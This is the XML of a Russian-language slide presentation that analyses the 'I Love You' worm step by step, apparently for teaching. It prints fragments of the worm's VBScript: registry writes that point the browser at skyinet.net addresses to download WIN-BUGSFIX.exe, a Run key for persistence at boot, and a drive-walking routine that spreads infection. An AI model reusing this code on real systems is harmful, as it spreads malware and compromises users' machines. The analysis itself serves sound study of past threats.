            <a:ext cx="4038600" cy="11430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fileexist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dirsystem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&amp;"\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WinFAT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32.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exe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")=1)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then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Randomize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num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((4 *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Rnd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 + 1)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32" y="285728"/>
            <a:ext cx="4038600" cy="1349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/>
              <a:t>Проверяется наличие в системном каталоге файла </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>WinFAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>32.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t> и при его наличии генерируется случайное число в пределах 1 - 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1500" dirty="0"/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142844" y="1433740"/>
            <a:ext cx="6594246" cy="5567160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" anchor="t">
            <a:normAutofit fontScale="550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 num = 1 then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regcreate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"HKCU\Software\Microsoft\Internet Explorer\Main\Start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Page","http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://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www.skyinet.net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/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-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BUGSFIX.exe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elseif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num = 2 then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regcreate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"HKCU\Software\Microsoft\Internet Explorer\Main\Start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Page","http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://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www.skyinet.net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/~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angelcat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/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-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BUGSFIX.exe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elseif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num = 3 then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regcreate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"HKCU\Software\Microsoft\Internet Explorer\Main\Start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Page","http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://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www.skyinet.net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/~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koichi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/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-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BUGSFIX.exe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elseif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num = 4 then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regcreate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"HKCU\Software\Microsoft\Internet Explorer\Main\Start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Page","http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://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www.skyinet.net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/~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chu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/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-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BUGSFIX.exe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 if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 if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786610" y="1556364"/>
            <a:ext cx="2214546" cy="4730156"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="ru-RU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 случае наличия в системной директории файла </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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WinFAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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32.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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производится прописывание одного из четырех адресов сайта  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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skyinet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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 в реестре в качестве стартовой страницы для </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Microsoft Internet Explorer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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(в зависимости от сгенерированного случайного числа ). С сервера скачивается файл  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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WIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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BUGSFIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1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endParaRPr lang="ru-RU" sz="1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00868" y="500042"/>
            <a:ext cx="2328850" cy="55721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500" dirty="0" smtClean="0"/>
              <a:t>При наличии файла</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> WIN-BUGSFIX.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>в каталоге</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> Download  ( C: \ ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>в реестре прописывается ключ для его запуска при загрузке</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>и стартовой страницей</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> Microsoft Internet Explorer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>прописывается файл</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>about:blank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/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214282" y="647922"/>
            <a:ext cx="6594246" cy="32097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fileexist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downread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&amp;"\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WIN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BUGSFIX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exe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")=0)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then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regcreate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"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\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CurrentVersion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\Run\WIN-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BUGSFIX",downread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&amp;"\WIN-BUGSFIX.exe"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regcreate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"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","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about:blank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 if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 sub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366682" y="4357694"/>
            <a:ext cx="8348722" cy="20717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ru-RU" sz="1600" dirty="0" smtClean="0"/>
          </a:p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ru-RU" sz="1600" dirty="0" smtClean="0"/>
          </a:p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ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>На этом заканчивается внедрение вируса в систему, и он переходит к активным деструктивным действиям.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Процедура деструктивных действий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28868"/>
            <a:ext cx="4038600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sub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listadriv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On Error Resume Next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d,dc,s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Set dc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fso.Drives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For Each d in dc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d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DriveType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= 2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or d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DriveType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=3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folderlist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d.path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&amp;"\")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if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Next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listadriv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end sub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428868"/>
            <a:ext cx="4214842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/>
              <a:t>Производится проверка типа дисков и поиск по всем дискам. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>Организум</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t> цикл просматриваем какие же дисководы имеет данный компьютер. Т.к. необходимы только фиксированные дисководы и сетевые ставим ограничение 2 и 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>В цикле просмотра дисководов появляется вызов новой программы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" smtClean="0"/>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>olderlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>d.path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t> &amp; "\"), а аргументом у него – путь к дисководу (С\:  и другие ...). Это означает, что выбрав первый же дисковод на вашем компьютере </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>скрипт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t> устремляется просматривать все папки находящиеся на нем.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1500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428596" y="1714487"/>
            <a:ext cx="8215370" cy="92869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lvl="0" indent="-384048" algn="ct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000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Подпрограмма поиска на дисках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377</TotalTime>
  <Words>2120</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Экран (4:3)</PresentationFormat>
  <Paragraphs>434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Яркая</vt:lpstr>
      <vt:lpstr>Интернет-червь  I Love You</vt:lpstr>
      <vt:lpstr>Краткое описание</vt:lpstr>
      <vt:lpstr>Исходный код вируса</vt:lpstr>
      <vt:lpstr>Слайд 4</vt:lpstr>
      <vt:lpstr>Главная процедура</vt:lpstr>
      <vt:lpstr>Процедура работы с реестром WINDOWS</vt:lpstr>
      <vt:lpstr>В случае наличия в системной директории файла WinFAT32.exe производится прописывание одного из четырех адресов сайта  http://www.skyinet.net/ в реестре в качестве стартовой страницы для Microsoft Internet Explorer (в зависимости от сгенерированного случайного числа ). С сервера скачивается файл  WIN-BUGSFIX.exe. </vt:lpstr>
      <vt:lpstr>Слайд 8</vt:lpstr>
      <vt:lpstr>Процедура деструктивных действий</vt:lpstr>
      <vt:lpstr>Подпрограмма заражения файлов</vt:lpstr>
      <vt:lpstr>Слайд 11</vt:lpstr>
      <vt:lpstr>Слайд 12</vt:lpstr>
      <vt:lpstr>Скрипт для программы mIRC32 (script.ini)</vt:lpstr>
      <vt:lpstr>Слайд 14</vt:lpstr>
      <vt:lpstr>Подпрограмма создания ключа в реестре</vt:lpstr>
      <vt:lpstr>Слайд 16</vt:lpstr>
      <vt:lpstr>Процедура рассылки копий вируса по электронной почте </vt:lpstr>
      <vt:lpstr>Слайд 18</vt:lpstr>
      <vt:lpstr>Слайд 19</vt:lpstr>
      <vt:lpstr>Процедура создания HTM страницы</vt:lpstr>
      <vt:lpstr>Слайд 21</vt:lpstr>
      <vt:lpstr>Слайд 22</vt:lpstr>
      <vt:lpstr>Слайд 23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Love You</dc:title>
  <dc:creator>User</dc:creator>
  <cp:lastModifiedBy>Valued Acer Customer</cp:lastModifiedBy>
  <cp:revision>48</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-05-24T15:52:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-04-03T06:32:40Z</dcterms:modified>
</cp:coreProperties>
</file>